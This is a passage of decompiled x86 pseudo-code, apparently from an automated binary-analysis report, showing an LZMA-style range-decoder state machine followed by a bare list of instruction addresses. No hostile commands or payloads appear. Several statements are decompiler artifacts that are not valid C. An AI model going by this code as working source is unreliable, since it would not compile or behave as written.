								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x5c) & 0x000000ff;
							__esi =  *(__ebp - 0x60);
							__cl = 8;
							__cl = 8 -  *(__ebp - 0x3c);
							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
							__ecx =  *(__ebp - 0x3c);
							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
							__ecx =  *(__ebp - 4);
							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
							__eflags =  *(__ebp - 0x38) - 4;
							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							if( *(__ebp - 0x38) >= 4) {
								__eflags =  *(__ebp - 0x38) - 0xa;
								if( *(__ebp - 0x38) >= 0xa) {
									_t98 = __ebp - 0x38;
									 *_t98 =  *(__ebp - 0x38) - 6;
									__eflags =  *_t98;
								} else {
									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
								}
							} else {
								 *(__ebp - 0x38) = 0;
							}
							__eflags =  *(__ebp - 0x34) - __edx;
							if( *(__ebp - 0x34) == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L61;
							} else {
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__ecx =  *(__ebp - 8);
								__ebx = 0;
								__ebx = 1;
								__al =  *((intOrPtr*)(__eax + __ecx));
								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
								goto L41;
							}
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L69;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							goto L0;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							goto L89;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							L37:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xd;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t122 = __ebp - 0x70;
							 *_t122 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t122;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L39:
							__eax =  *(__ebp - 0x40);
							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
								goto L48;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L54;
							}
							L41:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L39;
							} else {
								goto L37;
							}
						case 0xe:
							L46:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xe;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t156 = __ebp - 0x70;
							 *_t156 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t156;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							while(1) {
								L48:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax =  *(__ebp - 0x58);
								__edx = __ebx + __ebx;
								__ecx =  *(__ebp - 0x10);
								__esi = __edx + __eax;
								__ecx =  *(__ebp - 0x10) >> 0xb;
								__ax =  *__esi;
								 *(__ebp - 0x54) = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
								__eflags =  *(__ebp - 0xc) - __ecx;
								if( *(__ebp - 0xc) >= __ecx) {
									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
									__cx = __ax;
									_t170 = __edx + 1; // 0x1
									__ebx = _t170;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									 *(__ebp - 0x10) = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0x10) >= 0x1000000) {
									continue;
								} else {
									goto L46;
								}
							}
							L54:
							_t173 = __ebp - 0x34;
							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
							__eflags =  *_t173;
							goto L55;
						case 0xf:
							L58:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xf;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t203 = __ebp - 0x70;
							 *_t203 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t203;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L60:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L55:
								__al =  *(__ebp - 0x44);
								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
								goto L56;
							}
							L61:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t217 = __edx + 1; // 0x1
								__ebx = _t217;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L60;
							} else {
								goto L58;
							}
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							goto L69;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							L56:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1a;
								goto L170;
							}
							__ecx =  *(__ebp - 0x68);
							__al =  *(__ebp - 0x5c);
							__edx =  *(__ebp - 8);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
							 *( *(__ebp - 0x68)) = __al;
							__ecx =  *(__ebp - 0x14);
							 *(__ecx +  *(__ebp - 8)) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t192 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t192;
							goto L79;
						case 0x1b:
							goto L75;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = _t414;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}

0x00000000
0x0040647d
0x0040647d
0x00406481
0x00406538
0x0040653b
0x00406547
0x00406428
0x00406428
0x0040642b
0x0040679d
0x0040679d
0x004067a0
0x004067a0
0x004067a6
0x004067ac
0x004067b2
0x004067cc
0x004067cf
0x004067d5
0x004067e0
0x004067e2
0x004067b4
0x004067b4
0x004067c3
0x004067c7
0x004067c7
0x004067ec
0x00406813
0x00406813
0x00406819
0x00406819
0x00000000
0x004067ee
0x004067ee
0x004067f2
0x004069a1
0x00000000
0x004069a1
0x004067fe
0x00406805
0x0040680d
0x00406810
0x00000000
0x00406810
0x00406487
0x0040648b
0x004069cc
0x004069cc
0x004069cf
0x004069d3
0x004069d3
0x00406491
0x00406497
0x0040649a
0x0040649e
0x004064a1
0x004064a5
0x0040696b
0x004069b7
0x004069bf
0x004069c6
0x004069c8
0x00000000
0x004069c8
0x004064ab
0x004064ae
0x004064b4
0x004064b6
0x004064b6
0x004064b9
0x004064bc
0x004064bf
0x004064c2
0x004064c5
0x004064c8
0x004064c9
0x004064cb
0x004064cb
0x004064cb
0x004064ce
0x004064d1
0x004064d4
0x004064d7
0x004064d7
0x004064da
0x004064dc
0x004064dc
0x004064df
0x004064df
0x004064df
0x00405fb5
0x00405fb5
0x00405fbe
0x00000000
0x00000000
0x00405fc4
0x00000000
0x00405fcf
0x00000000
0x00000000
0x00405fd8
0x00405fdb
0x00405fde
0x00405fe2
0x00000000
0x00000000
0x00405fe8
0x00405feb
0x00405fed
0x00405fee
0x00405ff1
0x00405ff3
0x00405ff4
0x00405ff6
0x00405ff9
0x00405ffe
0x00406003
0x0040600c
0x0040601f
0x00406022
0x0040602e
0x00406056
0x00406058
0x00406066
0x00406066
0x0040606a
0x00000000
0x00000000
0x00000000
0x00000000
0x0040605a
0x0040605a
0x0040605d
0x0040605e
0x0040605e
0x00000000
0x0040605a
0x00406034
0x00406039
0x00406039
0x00406042
0x0040604a
0x0040604d
0x00000000
0x00406053
0x00406053
0x00000000
0x00406053
0x00000000
0x00406070
0x00406070
0x00406074
0x00406920
0x00000000
0x00406920
0x0040607d
0x0040608d
0x00406090
0x00406093
0x00406093
0x00406093
0x00406096
0x0040609a
0x00000000
0x00000000
0x0040609c
0x004060a2
0x004060cc
0x004060d2
0x004060d9
0x00000000
0x004060d9
0x004060a8
0x004060ab
0x004060b0
0x004060b0
0x004060bb
0x004060c3
0x004060c6
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040610b
0x00406111
0x00406114
0x00406121
0x00406129
0x00000000
0x00000000
0x004060e0
0x004060e0
0x004060e4
0x0040692f
0x00000000
0x0040692f
0x004060f0
0x004060fb
0x004060fb
0x004060fb
0x004060fe
0x00406101
0x00406104
0x00406109
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406131
0x00406133
0x00406136
0x004061a7
0x004061aa
0x004061ad
0x004061b4
0x004061be
0x00000000
0x004061be
0x00406138
0x0040613c
0x0040613f
0x00406141
0x00406144
0x00406147
0x00406149
0x0040614c
0x0040614e
0x00406153
0x00406156
0x00406159
0x0040615d
0x00406164
0x00406167
0x0040616e
0x00406172
0x0040617a
0x0040617a
0x0040617a
0x00406174
0x00406174
0x00406174
0x00406169
0x00406169
0x00406169
0x0040617e
0x00406181
0x0040619f
0x004061a1
0x00000000
0x00406183
0x00406183
0x00406186
0x00406189
0x0040618c
0x0040618e
0x0040618e
0x0040618e
0x00406191
0x00406194
0x00406196
0x00406197
0x0040619a
0x00000000
0x0040619a
0x00000000
0x004063d0
0x004063d4
0x004063f2
0x004063f5
0x004063fc
0x004063ff
0x00406402
0x00406405
0x00406408
0x0040640b
